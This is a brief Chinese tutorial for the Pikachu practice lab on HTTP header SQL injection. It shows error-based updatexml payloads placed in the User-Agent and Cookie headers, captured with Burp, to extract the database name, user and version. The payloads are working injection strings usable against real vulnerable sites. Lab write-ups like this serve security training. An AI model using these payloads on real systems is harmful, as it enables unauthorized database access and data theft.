Pikachu靶场 “Http Header”SQL注入

1. 先在 pikachu 打开 Http Header 注入模块，点击提示 查看登录 账号 和 密码，登陆后去 Burp 中找到登陆的 GET请求

2. 设置payload1 ：在 User-Agent最后 输入 

查看 数据库名 

' or updatexml(1,concat(0x7e,database()),0) or '

 

查看 用户名

' or updatexml(1,concat(0x7e,user()),0) or '

3. 因为有些把 user-agent等请求头键值对 的数据也保存在了 数据库 里面

4. php专门取请求头数据的方法 : $_SERVER[ ' 请求头键 ' ] 就能拿到值。 

5. 或者 设置payload2 ：在 Cookie: ant[uname]=admin后面，“;” 前面 输入 

'and updatexml(1,concat(0x7e,(SELECT @@version) , 0x7e) ,1) #